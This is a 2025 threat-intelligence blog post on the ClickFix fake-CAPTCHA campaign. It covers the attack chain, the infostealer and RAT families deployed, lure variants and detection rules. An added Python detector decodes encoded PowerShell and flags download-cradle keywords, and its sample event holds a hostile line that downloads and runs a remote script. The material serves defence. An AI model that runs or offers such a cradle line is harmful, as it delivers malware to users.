ClickFix: The Fake CAPTCHA Campaign That Made Users Execute Their Own Malware
Threat Intelligence
ClickFix weaponised browser-based fake CAPTCHA prompts to trick users into pasting malicious PowerShell commands into their own terminals. A 2025 campaign analysis covering the delivery chain, malware families deployed, and detection strategies.
By Arjun Raghavan, Security & Systems Lead, BIPI · August 3, 2025 · 11 min read
ClickFix is a social engineering technique, first documented at scale in late 2024 and significantly expanded through 2025, that bypasses traditional email gateway and browser security controls by outsourcing the malicious execution step to the user. The attack presents a convincing browser overlay — typically styled as a CAPTCHA verification, a Microsoft Word rendering error, or a Google Meet connectivity check — and instructs the user to open the Windows Run dialog or PowerShell and paste a command to 'fix' the problem.
The effectiveness of ClickFix stems from a simple insight: users who are trained not to open email attachments or run unsigned executables have no trained response to 'copy this command and paste it into PowerShell.' Browser security controls do not flag clipboard content. Endpoint protection tools often miss the execution because the process parent chain is legitimate.
Attack Chain Mechanics
The delivery chain typically begins with a malvertising redirect or a compromised legitimate website. The victim lands on a page that renders a full-screen overlay with professional branding. The overlay contains a 'Verify you are human' or 'Fix rendering error' prompt with a copy button. Clicking copy writes a Base64-encoded PowerShell one-liner to the clipboard. The page then displays an animation suggesting the user press Win+R, type 'powershell', paste, and press Enter.
- Victim arrives via malvertising redirect, SEO-poisoned search result, or phishing link
- Page renders full-screen overlay mimicking CAPTCHA, Microsoft Update, or Google Meet prompt
- User clicks 'Fix' or 'Verify' button — clipboard is silently populated with encoded PowerShell
- Overlay instructs user to open Run dialog (Win+R) and paste the command
- PowerShell executes, downloads second-stage payload from a CDN or cloud storage URL
- Second stage drops infostealer, RAT, or ransomware loader; establishes C2 persistence
Malware Families Deployed in 2025 Campaigns
Threat intelligence vendors tracked significant volume across several malware families distributed via ClickFix in 2025. LummaC2 — a commercially sold infostealer — dominated by share of infections, targeting browser credential stores, cryptocurrency wallets, and session cookies. NetSupport RAT appeared in campaigns targeting corporate networks, providing persistent remote access for follow-on hands-on-keyboard operations by initial access brokers who resell to ransomware affiliates.
- LummaC2: steals browser credentials, session cookies, crypto wallets; sold as MaaS with $250/month tiers
- StealC: lightweight credential harvester focused on password managers and email clients
- NetSupport RAT: full remote access, deployed when the initial access broker identifies a high-value corporate target
- DarkGate: multi-function loader with cryptomining, RAT, and information-stealing modules
- AsyncRAT: open-source RAT used in lower-sophistication campaigns; often combined with clipboard hijacker for crypto theft
Variants and Lure Themes
ClickFix operators iterate rapidly on lure themes. CAPTCHA variants use Cloudflare Turnstile styling with a fake verification spinner. Word and Excel variants display a message claiming the document cannot render because a font or extension is missing. Google Meet variants show a fake audio/video error with a QR code alongside the PowerShell instructions. GitHub variants impersonate repository error pages. The common thread is urgency and a plausible technical explanation that a non-technical user would accept.
Detection and Prevention
- In your EDR policy, block PowerShell launched with mshta.exe, RunDll32, or wscript.exe as its parent process
- Alert on PowerShell invoked with the -EncodedCommand flag when its parent process is explorer.exe or a cmd.exe launched from the Run dialog
- DNS sinkhole known ClickFix CDN infrastructure; threat intel feeds from Proofpoint ET and abuse.ch publish updated IOCs
- Deploy Controlled Folder Access to block credential database access by unsigned processes
- Train users specifically on the 'paste into terminal' social engineering pattern — most have never seen it
- Browser extensions that intercept clipboard-write operations can alert users when a site writes content to the clipboard
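To make the parent-process and -EncodedCommand rules above concrete, here is an added Python example (not code from the original post or from BIPI) that runs them over constructed Sysmon-style process-creation records: it decodes -EncodedCommand, checks the parent patterns from the attack chain described earlier (explorer.exe for a Win+R paste, the mshta/RunDll32/wscript launchers), and looks for download-cradle keywords in the decoded script. The cradle keyword list, the event field names and the sample events are assumptions.

```python
import base64
import re

# Launchers from the page's EDR guidance; parents seen when a user pastes into Win+R or cmd.
LOLBIN_PARENTS = {"mshta.exe", "rundll32.exe", "wscript.exe"}
RUN_DIALOG_PARENTS = {"explorer.exe", "cmd.exe"}
# Download-and-execute cradle keywords: an assumed starter list, extend per environment.
CRADLE_RE = re.compile(r"invoke-webrequest|\biwr\b|invoke-expression|\biex\b|"
                       r"downloadstring|downloadfile|net\.webclient|frombase64string", re.I)
ENC_RE = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)  # accepted abbreviations

def encode_powershell(script: str) -> str:  # -EncodedCommand is Base64 over UTF-16LE text
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

def decode_encoded_command(cmdline: str):
    """Return the script carried by -EncodedCommand, or None if absent or undecodable."""
    if not (m := ENC_RE.search(cmdline)):
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def classify_event(event: dict) -> list:
    """Reasons a process-creation event matches the ClickFix pattern (empty list = clean)."""
    image = event["Image"].rsplit("\\", 1)[-1].lower()
    parent = event["ParentImage"].rsplit("\\", 1)[-1].lower()
    if image not in {"powershell.exe", "pwsh.exe"}:
        return []
    reasons = []
    if parent in LOLBIN_PARENTS:
        reasons.append(f"powershell launched by {parent}")
    decoded = decode_encoded_command(event["CommandLine"])
    if decoded is not None and parent in RUN_DIALOG_PARENTS:
        reasons.append(f"-EncodedCommand under {parent} (Run dialog paste pattern)")
    # Search the decoded script when there is one, so Base64 wrapping cannot hide the cradle.
    if CRADLE_RE.search(decoded if decoded is not None else event["CommandLine"]):
        reasons.append("download/execute cradle in command text")
    return reasons

# Constructed Sysmon Event ID 1 style records (not real telemetry): a Win+R paste and a benign script.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell -w hidden -enc "
                    + encode_powershell("iwr 'https://cdn.example.invalid/s.ps1' | iex")},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"powershell -File C:\Scripts\rotate-logs.ps1"},
]
```

Calling classify_event on each record of SAMPLE_EVENTS flags the first with two reasons and leaves the second clean.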
Threat Actor Attribution
ClickFix is not a single threat actor — it is a technique adopted across the cybercriminal ecosystem. Initial access brokers use it to build credential inventories for sale. Ransomware affiliates use it to establish footholds in corporate networks. Nation-state adjacent groups have been observed using ClickFix lures to deploy espionage implants targeting defence contractors. The democratisation of the technique, combined with its effectiveness against standard security controls, makes it one of the defining malware delivery trends of 2025.
ClickFix is proof that the most dangerous line of code is the one the user types themselves. No malicious file, no suspicious download — just a convincingly framed social prompt that routes around every technical control.